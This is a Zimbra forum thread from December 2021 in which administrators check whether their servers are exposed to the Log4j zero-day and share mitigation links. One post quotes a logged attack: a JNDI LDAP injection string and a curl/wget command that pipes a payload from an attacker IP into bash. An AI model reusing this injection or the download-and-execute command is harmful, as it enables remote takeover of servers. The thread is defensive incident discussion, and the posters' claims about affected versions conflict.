log4j-zero-day exploit - active attacks

irv · Post by **irv** » Fri Dec 10, 2021 9:37 pm

Hi

Need for confirmation. Zimbra used log4j - and now I got alert from CVE with threat 10/10.
If and if yes, to what extend and what version of Zimbra servers are affected.

https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging

about exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"

https://www.bleepingcomputer.com/news/s ... nightmare/

how this is working:
https://www.lunasec.io/docs/blog/log4j-zero-day/

JDunphy · Post by **JDunphy** » Fri Dec 10, 2021 9:52 pm

I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim

pixelplumber · Post by **pixelplumber** » Fri Dec 10, 2021 9:58 pm

This post on confluence community also suggests ver. 1.x not vulnerable to the JNDI exploit, but I can't verify that.

Looking for log4j all I can see is:

Code: Select all

# find / -name *log4j*
/opt/zimbra/common/jetty_home/modules/logging-log4j.mod
/opt/zimbra/common/jetty_home/modules/logging-log4j2.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j2.mod
/opt/zimbra/common/jetty_home/modules/log4j2-slf4j.mod
/opt/zimbra/common/jetty_home/modules/log4j-impl
/opt/zimbra/common/jetty_home/modules/log4j-impl/resources/log4j.xml
/opt/zimbra/common/jetty_home/modules/log4j-impl.mod
/opt/zimbra/common/jetty_home/modules/log4j2-api.mod
/opt/zimbra/common/jetty_home/modules/log4j2-impl
/opt/zimbra/common/jetty_home/modules/log4j2-impl/resources/log4j2.xml
/opt/zimbra/common/jetty_home/modules/log4j2-impl.mod
/opt/zimbra/conf/log4j.properties.in
/opt/zimbra/conf/milter.log4j.properties
/opt/zimbra/conf/zmconfigd.log4j.properties
/opt/zimbra/conf/log4j.properties
/opt/zimbra/lib/jars/apache-log4j-extras-1.0.jar
/opt/zimbra/lib/jars/slf4j-log4j12-1.7.30.jar
/opt/zimbra/lib/jars/log4j-1.2.16.jar
/opt/zimbra/lib/jars/syslog4j-0.9.46.jar
/opt/zimbra/log/zmconfigd-log4j.log

irv · Post by **irv** » Fri Dec 10, 2021 10:02 pm

Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?

Thanks.

JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking ip's for ipset's, etc. GreyNoise is providing these in real-time of ip's that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim

pixelplumber · Post by **pixelplumber** » Fri Dec 10, 2021 10:04 pm

JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
Jim

In Jim's link to the hashes above, they mention 1.x might be vulnerable too with a link to this github issue mentioning an avenue lookups could be triggered?

sigtrap · Post by **sigtrap** » Fri Dec 10, 2021 10:19 pm

irv wrote:Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?

Thanks.

I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)

irv · Post by **irv** » Fri Dec 10, 2021 10:36 pm

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwg(......)}"
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash

I found that, so looks like they are trying.

I think fail2ban on firewall + log monitoring can help tempolary to cut of that attacks.

sigtrap wrote:
irv wrote:Thanks for that .csv file. Just implemented a script to block that ip's on firewalls.
And checking # to see if my installations of zimbra are affected.
I also have couple of vmware systems, but I look for vmware KB to be updated and patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And wonder if that version is affected. Anyone can point me somewhere where I could find some more details?

Thanks.
I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)

PL123 · Post by **PL123** » Fri Dec 10, 2021 11:03 pm

Can confirm Zimbra 8.8.15_GA_4177 is vulnerable as well.

L. Mark Stone · Post by **L. Mark Stone** » Fri Dec 10, 2021 11:12 pm

I opened a Support Case with Zimbra on this earlier today. Zimbra have reported back to me that the 1.2.16 version of Log4j used by Zimbra is NOT subject to this exploit.

If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.

All the best,
Mark

PL123 · Post by **PL123** » Fri Dec 10, 2021 11:31 pm

L. Mark Stone wrote: If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.

I don't see an option to send you a PM. Might be as my account is new or something. Am happy to send you infos to replicate it yourself.

Zimbra Forums

log4j-zero-day exploit - active attacks

log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks

Re: log4j-zero-day exploit - active attacks